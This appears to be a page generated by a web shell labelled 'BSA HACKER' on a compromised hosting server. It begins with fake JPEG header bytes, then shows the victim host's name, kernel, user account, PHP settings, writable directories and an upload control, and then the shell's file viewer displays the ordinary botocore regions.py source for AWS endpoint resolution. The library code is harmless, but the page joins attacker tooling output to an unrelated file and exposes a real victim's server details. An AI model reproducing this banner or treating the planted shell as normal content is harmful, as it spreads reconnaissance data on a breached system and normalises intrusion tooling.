ÿØÿàJFIFHHÿá .
BSA HACKER
Logo of a company Server : Apache
System : Linux nusantara.hosteko.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : koperas1 ( 1254)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/opt/cppython/lib/python3.8/site-packages/botocore/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/opt/cppython/lib/python3.8/site-packages/botocore/regions.py
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Resolves regions and endpoints.

This module implements endpoint resolution, including resolving endpoints for a
given service and region and resolving the available endpoints for a service
in a specific AWS partition.
"""
import copy
import logging
import re
from enum import Enum

from botocore import UNSIGNED, xform_name
from botocore.auth import AUTH_TYPE_MAPS, HAS_CRT
from botocore.crt import CRT_SUPPORTED_AUTH_TYPES
from botocore.endpoint_provider import EndpointProvider
from botocore.exceptions import (
    EndpointProviderError,
    EndpointVariantError,
    InvalidEndpointConfigurationError,
    InvalidHostLabelError,
    MissingDependencyException,
    NoRegionError,
    ParamValidationError,
    UnknownEndpointResolutionBuiltInName,
    UnknownRegionError,
    UnknownSignatureVersionError,
    UnsupportedS3AccesspointConfigurationError,
    UnsupportedS3ConfigurationError,
    UnsupportedS3ControlArnError,
    UnsupportedS3ControlConfigurationError,
)
from botocore.utils import ensure_boolean, instance_cache

LOG = logging.getLogger(__name__)
DEFAULT_URI_TEMPLATE = '{service}.{region}.{dnsSuffix}'  # noqa
DEFAULT_SERVICE_DATA = {'endpoints': {}}


class BaseEndpointResolver:
    """Resolves regions and endpoints. Must be subclassed."""

    def construct_endpoint(self, service_name, region_name=None):
        """Resolves an endpoint for a service and region combination.

        :type service_name: string
        :param service_name: Name of the service to resolve an endpoint for
            (e.g., s3)

        :type region_name: string
        :param region_name: Region/endpoint name to resolve (e.g., us-east-1)
            if no region is provided, the first found partition-wide endpoint
            will be used if available.

        :rtype: dict
        :return: Returns a dict containing the following keys:
            - partition: (string, required) Resolved partition name
            - endpointName: (string, required) Resolved endpoint name
            - hostname: (string, required) Hostname to use for this endpoint
            - sslCommonName: (string) sslCommonName to use for this endpoint.
            - credentialScope: (dict) Signature version 4 credential scope
              - region: (string) region name override when signing.
              - service: (string) service name override when signing.
            - signatureVersions: (list<string>) A list of possible signature
              versions, including s3, v4, v2, and s3v4
            - protocols: (list<string>) A list of supported protocols
              (e.g., http, https)
            - ...: Other keys may be included as well based on the metadata
        """
        raise NotImplementedError

    def get_available_partitions(self):
        """Lists the partitions available to the endpoint resolver.

        :return: Returns a list of partition names (e.g., ["aws", "aws-cn"]).
        """
        raise NotImplementedError

    def get_available_endpoints(
        self, service_name, partition_name='aws', allow_non_regional=False
    ):
        """Lists the endpoint names of a particular partition.

        :type service_name: string
        :param service_name: Name of a service to list endpoint for (e.g., s3)

        :type partition_name: string
        :param partition_name: Name of the partition to limit endpoints to.
            (e.g., aws for the public AWS endpoints, aws-cn for AWS China
            endpoints, aws-us-gov for AWS GovCloud (US) Endpoints, etc.

        :type allow_non_regional: bool
        :param allow_non_regional: Set to True to include endpoints that are
             not regional endpoints (e.g., s3-external-1,
             fips-us-gov-west-1, etc).
        :return: Returns a list of endpoint names (e.g., ["us-east-1"]).
        """
        raise NotImplementedError


class EndpointResolver(BaseEndpointResolver):
    """Resolves endpoints based on partition endpoint metadata"""

    _UNSUPPORTED_DUALSTACK_PARTITIONS = ['aws-iso', 'aws-iso-b']

    def __init__(self, endpoint_data, uses_builtin_data=False):
        """
        :type endpoint_data: dict
        :param endpoint_data: A dict of partition data.

        :type uses_builtin_data: boolean
        :param uses_builtin_data: Whether the endpoint data originates in the
            package's data directory.
        """
        if 'partitions' not in endpoint_data:
            raise ValueError('Missing "partitions" in endpoint data')
        self._endpoint_data = endpoint_data
        self.uses_builtin_data = uses_builtin_data

    def get_service_endpoints_data(self, service_name, partition_name='aws'):
        for partition in self._endpoint_data['partitions']:
            if partition['partition'] != partition_name:
                continue
            services = partition['services']
            if service_name not in services:
                continue
            return services[service_name]['endpoints']

    def get_available_partitions(self):
        result = []
        for partition in self._endpoint_data['partitions']:
            result.append(partition['partition'])
        return result

    def get_available_endpoints(
        self,
        service_name,
        partition_name='aws',
        allow_non_regional=False,
        endpoint_variant_tags=None,
    ):
        result = []
        for partition in self._endpoint_data['partitions']:
            if partition['partition'] != partition_name:
                continue
            services = partition['services']
            if service_name not in services:
                continue
            service_endpoints = services[service_name]['endpoints']
            for endpoint_name in service_endpoints:
                is_regional_endpoint = endpoint_name in partition['regions']
                # Only regional endpoints can be modeled with variants
                if endpoint_variant_tags and is_regional_endpoint:
                    variant_data = self._retrieve_variant_data(
                        service_endpoints[endpoint_name], endpoint_variant_tags
                    )
                    if variant_data:
                        result.append(endpoint_name)
                elif allow_non_regional or is_regional_endpoint:
                    result.append(endpoint_name)
        return result

    def get_partition_dns_suffix(
        self, partition_name, endpoint_variant_tags=None
    ):
        for partition in self._endpoint_data['partitions']:
            if partition['partition'] == partition_name:
                if endpoint_variant_tags:
                    variant = self._retrieve_variant_data(
                        partition.get('defaults'), endpoint_variant_tags
                    )
                    if variant and 'dnsSuffix' in variant:
                        return variant['dnsSuffix']
                else:
                    return partition['dnsSuffix']
        return None

    def construct_endpoint(
        self,
        service_name,
        region_name=None,
        partition_name=None,
        use_dualstack_endpoint=False,
        use_fips_endpoint=False,
    ):
        if (
            service_name == 's3'
            and use_dualstack_endpoint
            and region_name is None
        ):
            region_name = 'us-east-1'

        if partition_name is not None:
            valid_partition = None
            for partition in self._endpoint_data['partitions']:
                if partition['partition'] == partition_name:
                    valid_partition = partition

            if valid_partition is not None:
                result = self._endpoint_for_partition(
                    valid_partition,
                    service_name,
                    region_name,
                    use_dualstack_endpoint,
                    use_fips_endpoint,
                    True,
                )
                return result
            return None

        # Iterate over each partition until a match is found.
        for partition in self._endpoint_data['partitions']:
            if use_dualstack_endpoint and (
                partition['partition']
                in self._UNSUPPORTED_DUALSTACK_PARTITIONS
            ):
                continue
            result = self._endpoint_for_partition(
                partition,
                service_name,
                region_name,
                use_dualstack_endpoint,
                use_fips_endpoint,
            )
            if result:
                return result

    def get_partition_for_region(self, region_name):
        for partition in self._endpoint_data['partitions']:
            if self._region_match(partition, region_name):
                return partition['partition']
        raise UnknownRegionError(
            region_name=region_name,
            error_msg='No partition found for provided region_name.',
        )

    def _endpoint_for_partition(
        self,
        partition,
        service_name,
        region_name,
        use_dualstack_endpoint,
        use_fips_endpoint,
        force_partition=False,
    ):
        partition_name = partition["partition"]
        if (
            use_dualstack_endpoint
            and partition_name in self._UNSUPPORTED_DUALSTACK_PARTITIONS
        ):
            error_msg = (
                "Dualstack endpoints are currently not supported"
                " for %s partition" % partition_name
            )
            raise EndpointVariantError(tags=['dualstack'], error_msg=error_msg)

        # Get the service from the partition, or an empty template.
        service_data = partition['services'].get(
            service_name, DEFAULT_SERVICE_DATA
        )
        # Use the partition endpoint if no region is supplied.
        if region_name is None:
            if 'partitionEndpoint' in service_data:
                region_name = service_data['partitionEndpoint']
            else:
                raise NoRegionError()

        resolve_kwargs = {
            'partition': partition,
            'service_name': service_name,
            'service_data': service_data,
            'endpoint_name': region_name,
            'use_dualstack_endpoint': use_dualstack_endpoint,
            'use_fips_endpoint': use_fips_endpoint,
        }

        # Attempt to resolve the exact region for this partition.
        if region_name in service_data['endpoints']:
            return self._resolve(**resolve_kwargs)

        # Check to see if the endpoint provided is valid for the partition.
        if self._region_match(partition, region_name) or force_partition:
            # Use the partition endpoint if set and not regionalized.
            partition_endpoint = service_data.get('partitionEndpoint')
            is_regionalized = service_data.get('isRegionalized', True)
            if partition_endpoint and not is_regionalized:
                LOG.debug(
                    'Using partition endpoint for %s, %s: %s',
                    service_name,
                    region_name,
                    partition_endpoint,
                )
                resolve_kwargs['endpoint_name'] = partition_endpoint
                return self._resolve(**resolve_kwargs)
            LOG.debug(
                'Creating a regex based endpoint for %s, %s',
                service_name,
                region_name,
            )
            return self._resolve(**resolve_kwargs)

    def _region_match(self, partition, region_name):
        if region_name in partition['regions']:
            return True
        if 'regionRegex' in partition:
            return re.compile(partition['regionRegex']).match(region_name)
        return False

    def _retrieve_variant_data(self, endpoint_data, tags):
        variants = endpoint_data.get('variants', [])
        for variant in variants:
            if set(variant['tags']) == set(tags):
                result = variant.copy()
                return result

    def _create_tag_list(self, use_dualstack_endpoint, use_fips_endpoint):
        tags = []
        if use_dualstack_endpoint:
            tags.append('dualstack')
        if use_fips_endpoint:
            tags.append('fips')
        return tags

    def _resolve_variant(
        self, tags, endpoint_data, service_defaults, partition_defaults
    ):
        result = {}
        for variants in [endpoint_data, service_defaults, partition_defaults]:
            variant = self._retrieve_variant_data(variants, tags)
            if variant:
                self._merge_keys(variant, result)
        return result

    def _resolve(
        self,
        partition,
        service_name,
        service_data,
        endpoint_name,
        use_dualstack_endpoint,
        use_fips_endpoint,
    ):
        endpoint_data = service_data.get('endpoints', {}).get(
            endpoint_name, {}
        )

        if endpoint_data.get('deprecated'):
            LOG.warning(
                'Client is configured with the deprecated endpoint: %s'
                % (endpoint_name)
            )

        service_defaults = service_data.get('defaults', {})
        partition_defaults = partition.get('defaults', {})
        tags = self._create_tag_list(use_dualstack_endpoint, use_fips_endpoint)

        if tags:
            result = self._resolve_variant(
                tags, endpoint_data, service_defaults, partition_defaults
            )
            if result == {}:
                error_msg = (
                    f"Endpoint does not exist for {service_name} "
                    f"in region {endpoint_name}"
                )
                raise EndpointVariantError(tags=tags, error_msg=error_msg)
            self._merge_keys(endpoint_data, result)
        else:
            result = endpoint_data

        # If dnsSuffix has not already been consumed from a variant definition
        if 'dnsSuffix' not in result:
            result['dnsSuffix'] = partition['dnsSuffix']

        result['partition'] = partition['partition']
        result['endpointName'] = endpoint_name

        # Merge in the service defaults then the partition defaults.
        self._merge_keys(service_defaults, result)
        self._merge_keys(partition_defaults, result)

        result['hostname'] = self._expand_template(
            partition,
            result['hostname'],
            service_name,
            endpoint_name,
            result['dnsSuffix'],
        )
        if 'sslCommonName' in result:
            result['sslCommonName'] = self._expand_template(
                partition,
                result['sslCommonName'],
                service_name,
                endpoint_name,
                result['dnsSuffix'],
            )

        return result

    def _merge_keys(self, from_data, result):
        for key in from_data:
            if key not in result:
                result[key] = from_data[key]

    def _expand_template(
        self, partition, template, service_name, endpoint_name, dnsSuffix
    ):
        return template.format(
            service=service_name, region=endpoint_name, dnsSuffix=dnsSuffix
        )


class EndpointResolverBuiltins(str, Enum):
    # The AWS Region configured for the SDK client (str)
    AWS_REGION = "AWS::Region"
    # Whether the UseFIPSEndpoint configuration option has been enabled for
    # the SDK client (bool)
    AWS_USE_FIPS = "AWS::UseFIPS"
    # Whether the UseDualStackEndpoint configuration option has been enabled
    # for the SDK client (bool)
    AWS_USE_DUALSTACK = "AWS::UseDualStack"
    # Whether the global endpoint should be used with STS, rather the the
    # regional endpoint for us-east-1 (bool)
    AWS_STS_USE_GLOBAL_ENDPOINT = "AWS::STS::UseGlobalEndpoint"
    # Whether the global endpoint should be used with S3, rather then the
    # regional endpoint for us-east-1 (bool)
    AWS_S3_USE_GLOBAL_ENDPOINT = "AWS::S3::UseGlobalEndpoint"
    # Whether S3 Transfer Acceleration has been requested (bool)
    AWS_S3_ACCELERATE = "AWS::S3::Accelerate"
    # Whether S3 Force Path Style has been enabled (bool)
    AWS_S3_FORCE_PATH_STYLE = "AWS::S3::ForcePathStyle"
    # Whether to use the ARN region or raise an error when ARN and client
    # region differ (for s3 service only, bool)
    AWS_S3_USE_ARN_REGION = "AWS::S3::UseArnRegion"
    # Whether to use the ARN region or raise an error when ARN and client
    # region differ (for s3-control service only, bool)
    AWS_S3CONTROL_USE_ARN_REGION = 'AWS::S3Control::UseArnRegion'
    # Whether multi-region access points (MRAP) should be disabled (bool)
    AWS_S3_DISABLE_MRAP = "AWS::S3::DisableMultiRegionAccessPoints"
    # Whether a custom endpoint has been configured (str)
    SDK_ENDPOINT = "SDK::Endpoint"


class EndpointRulesetResolver:
    """Resolves endpoints using a service's endpoint ruleset"""

    def __init__(
        self,
        endpoint_ruleset_data,
        partition_data,
        service_model,
        builtins,
        client_context,
        event_emitter,
        use_ssl=True,
        requested_auth_scheme=None,
    ):
        self._provider = EndpointProvider(
            ruleset_data=endpoint_ruleset_data,
            partition_data=partition_data,
        )
        self._param_definitions = self._provider.ruleset.parameters
        self._service_model = service_model
        self._builtins = builtins
        self._client_context = client_context
        self._event_emitter = event_emitter
        self._use_ssl = use_ssl
        self._requested_auth_scheme = requested_auth_scheme
        self._instance_cache = {}

    def construct_endpoint(
        self,
        operation_model,
        call_args,
        request_context,
    ):
        """Invokes the provider with params defined in the service's ruleset"""
        if call_args is None:
            call_args = {}

        if request_context is None:
            request_context = {}

        provider_params = self._get_provider_params(
            operation_model, call_args, request_context
        )
        LOG.debug(
            'Calling endpoint provider with parameters: %s' % provider_params
        )
        try:
            provider_result = self._provider.resolve_endpoint(
                **provider_params
            )
        except EndpointProviderError as ex:
            botocore_exception = self.ruleset_error_to_botocore_exception(
                ex, provider_params
            )
            if botocore_exception is None:
                raise
            else:
                raise botocore_exception from ex
        LOG.debug('Endpoint provider result: %s' % provider_result.url)

        # The endpoint provider does not support non-secure transport.
        if not self._use_ssl and provider_result.url.startswith('https://'):
            provider_result = provider_result._replace(
                url=f'http://{provider_result.url[8:]}'
            )

        # Multi-valued headers are not supported in botocore. Replace the list
        # of values returned for each header with just its first entry,
        # dropping any additionally entries.
        provider_result = provider_result._replace(
            headers={
                key: val[0] for key, val in provider_result.headers.items()
            }
        )

        return provider_result

    def _get_provider_params(
        self, operation_model, call_args, request_context
    ):
        """Resolve a value for each parameter defined in the service's ruleset

        The resolution order for parameter values is:
        1. Operation-specific static context values from the service definition
        2. Operation-specific dynamic context values from API parameters
        3. Client-specific context parameters
        4. Built-in values such as region, FIPS usage, ...
        """
        provider_params = {}
        # Builtin values can be customized for each operation by hooks
        # subscribing to the ``before-endpoint-resolution.*`` event.
        customized_builtins = self._get_customized_builtins(
            operation_model, call_args, request_context
        )
        for param_name, param_def in self._param_definitions.items():
            param_val = self._resolve_param_from_context(
                param_name=param_name,
                operation_model=operation_model,
                call_args=call_args,
            )
            if param_val is None and param_def.builtin is not None:
                param_val = self._resolve_param_as_builtin(
                    builtin_name=param_def.builtin,
                    builtins=customized_builtins,
                )
            if param_val is not None:
                provider_params[param_name] = param_val

        return provider_params

    def _resolve_param_from_context(
        self, param_name, operation_model, call_args
    ):
        static = self._resolve_param_as_static_context_param(
            param_name, operation_model
        )
        if static is not None:
            return static
        dynamic = self._resolve_param_as_dynamic_context_param(
            param_name, operation_model, call_args
        )
        if dynamic is not None:
            return dynamic
        return self._resolve_param_as_client_context_param(param_name)

    def _resolve_param_as_static_context_param(
        self, param_name, operation_model
    ):
        static_ctx_params = self._get_static_context_params(operation_model)
        return static_ctx_params.get(param_name)

    def _resolve_param_as_dynamic_context_param(
        self, param_name, operation_model, call_args
    ):
        dynamic_ctx_params = self._get_dynamic_context_params(operation_model)
        if param_name in dynamic_ctx_params:
            member_name = dynamic_ctx_params[param_name]
            return call_args.get(member_name)

    def _resolve_param_as_client_context_param(self, param_name):
        client_ctx_params = self._get_client_context_params()
        if param_name in client_ctx_params:
            client_ctx_varname = client_ctx_params[param_name]
            return self._client_context.get(client_ctx_varname)

    def _resolve_param_as_builtin(self, builtin_name, builtins):
        if builtin_name not in EndpointResolverBuiltins.__members__.values():
            raise UnknownEndpointResolutionBuiltInName(name=builtin_name)
        return builtins.get(builtin_name)

    @instance_cache
    def _get_static_context_params(self, operation_model):
        """Mapping of param names to static param value for an operation"""
        return {
            param.name: param.value
            for param in operation_model.static_context_parameters
        }

    @instance_cache
    def _get_dynamic_context_params(self, operation_model):
        """Mapping of param names to member names for an operation"""
        return {
            param.name: param.member_name
            for param in operation_model.context_parameters
        }

    @instance_cache
    def _get_client_context_params(self):
        """Mapping of param names to client configuration variable"""
        return {
            param.name: xform_name(param.name)
            for param in self._service_model.client_context_parameters
        }

    def _get_customized_builtins(
        self, operation_model, call_args, request_context
    ):
        service_id = self._service_model.service_id.hyphenize()
        customized_builtins = copy.copy(self._builtins)
        # Handlers are expected to modify the builtins dict in place.
        self._event_emitter.emit(
            'before-endpoint-resolution.%s' % service_id,
            builtins=customized_builtins,
            model=operation_model,
            params=call_args,
            context=request_context,
        )
        return customized_builtins

    def auth_schemes_to_signing_ctx(self, auth_schemes):
        """Convert an Endpoint's authSchemes property to a signing_context dict

        :type auth_schemes: list
        :param auth_schemes: A list of dictionaries taken from the
            ``authSchemes`` property of an Endpoint object returned by
            ``EndpointProvider``.

        :rtype: str, dict
        :return: Tuple of auth type string (to be used in
            ``request_context['auth_type']``) and signing context dict (for use
            in ``request_context['signing']``).
        """
        if not isinstance(auth_schemes, list) or len(auth_schemes) == 0:
            raise TypeError("auth_schemes must be a non-empty list.")

        LOG.debug(
            'Selecting from endpoint provider\'s list of auth schemes: %s. '
            'User selected auth scheme is: "%s"',
            ', '.join([f'"{s.get("name")}"' for s in auth_schemes]),
            self._requested_auth_scheme,
        )

        if self._requested_auth_scheme == UNSIGNED:
            return 'none', {}

        auth_schemes = [
            {**scheme, 'name': self._strip_sig_prefix(scheme['name'])}
            for scheme in auth_schemes
        ]
        if self._requested_auth_scheme is not None:
            try:
                # Use the first scheme that matches the requested scheme,
                # after accounting for naming differences between botocore and
                # endpoint rulesets. Keep the requested name.
                name, scheme = next(
                    (self._requested_auth_scheme, s)
                    for s in auth_schemes
                    if self._does_botocore_authname_match_ruleset_authname(
                        self._requested_auth_scheme, s['name']
                    )
                )
            except StopIteration:
                # For legacy signers, no match will be found. Do not raise an
                # exception, instead default to the logic in botocore
                # customizations.
                return None, {}
        else:
            try:
                name, scheme = next(
                    (s['name'], s)
                    for s in auth_schemes
                    if s['name'] in AUTH_TYPE_MAPS
                )
            except StopIteration:
                # If no auth scheme was specifically requested and an
                # authSchemes list is present in the Endpoint object but none
                # of the entries are supported, raise an exception.
                fixable_with_crt = False
                auth_type_options = [s['name'] for s in auth_schemes]
                if not HAS_CRT:
                    fixable_with_crt = any(
                        scheme in CRT_SUPPORTED_AUTH_TYPES
                        for scheme in auth_type_options
                    )

                if fixable_with_crt:
                    raise MissingDependencyException(
                        msg='This operation requires an additional dependency.'
                        ' Use pip install botocore[crt] before proceeding.'
                    )
                else:
                    raise UnknownSignatureVersionError(
                        signature_version=', '.join(auth_type_options)
                    )

        signing_context = {}
        if 'signingRegion' in scheme:
            signing_context['region'] = scheme['signingRegion']
        elif 'signingRegionSet' in scheme:
            if len(scheme['signingRegionSet']) > 0:
                signing_context['region'] = scheme['signingRegionSet'][0]
        if 'signingName' in scheme:
            signing_context.update(signing_name=scheme['signingName'])
        if 'disableDoubleEncoding' in scheme:
            signing_context['disableDoubleEncoding'] = ensure_boolean(
                scheme['disableDoubleEncoding']
            )

        LOG.debug(
            'Selected auth type "%s" as "%s" with signing context params: %s',
            scheme['name'],  # original name without "sig"
            name,  # chosen name can differ when `signature_version` is set
            signing_context,
        )
        return name, signing_context

    def _strip_sig_prefix(self, auth_name):
        """Normalize auth type names by removing any "sig" prefix"""
        return auth_name[3:] if auth_name.startswith('sig') else auth_name

    def _does_botocore_authname_match_ruleset_authname(self, botoname, rsname):
        """
        Whether a valid string provided as signature_version parameter for
        client construction refers to the same auth methods as a string
        returned by the endpoint ruleset provider. This accounts for:

        * The ruleset prefixes auth names with "sig"
        * The s3 and s3control rulesets don't distinguish between v4[a] and
          s3v4[a] signers
        * The v2, v3, and HMAC v1 based signers (s3, s3-*) are botocore legacy
          features and do not exist in the rulesets
        * Only characters up to the first dash are considered

        Example matches:
        * v4, sigv4
        * v4, v4
        * s3v4, sigv4
        * s3v7, sigv7 (hypothetical example)
        * s3v4a, sigv4a
        * s3v4-query, sigv4

        Example mismatches:
        * v4a, sigv4
        * s3, sigv4
        * s3-presign-post, sigv4
        """
        rsname = self._strip_sig_prefix(rsname)
        botoname = botoname.split('-')[0]
        if botoname != 's3' and botoname.startswith('s3'):
            botoname = botoname[2:]
        return rsname == botoname

    def ruleset_error_to_botocore_exception(self, ruleset_exception, params):
        """Attempts to translate ruleset errors to pre-existing botocore
        exception types by string matching exception strings.
        """
        msg = ruleset_exception.kwargs.get('msg')
        if msg is None:
            return

        if msg.startswith('Invalid region in ARN: '):
            # Example message:
            # "Invalid region in ARN: `us-we$t-2` (invalid DNS name)"
            try:
                label = msg.split('`')[1]
            except IndexError:
                label = msg
            return InvalidHostLabelError(label=label)

        service_name = self._service_model.service_name
        if service_name == 's3':
            if (
                msg == 'S3 Object Lambda does not support S3 Accelerate'
                or msg == 'Accelerate cannot be used with FIPS'
            ):
                return UnsupportedS3ConfigurationError(msg=msg)
            if (
                msg.startswith('S3 Outposts does not support')
                or msg.startswith('S3 MRAP does not support')
                or msg.startswith('S3 Object Lambda does not support')
                or msg.startswith('Access Points do not support')
                or msg.startswith('Invalid configuration:')
                or msg.startswith('Client was configured for partition')
            ):
                return UnsupportedS3AccesspointConfigurationError(msg=msg)
            if msg.lower().startswith('invalid arn:'):
                return ParamValidationError(report=msg)
        if service_name == 's3control':
            if msg.startswith('Invalid ARN:'):
                arn = params.get('Bucket')
                return UnsupportedS3ControlArnError(arn=arn, msg=msg)
            if msg.startswith('Invalid configuration:') or msg.startswith(
                'Client was configured for partition'
            ):
                return UnsupportedS3ControlConfigurationError(msg=msg)
            if msg == "AccountId is required but not set":
                return ParamValidationError(report=msg)
        if service_name == 'events':
            if msg.startswith(
                'Invalid Configuration: FIPS is not supported with '
                'EventBridge multi-region endpoints.'
            ):
                return InvalidEndpointConfigurationError(msg=msg)
            if msg == 'EndpointId must be a valid host label.':
                return InvalidEndpointConfigurationError(msg=msg)
        return None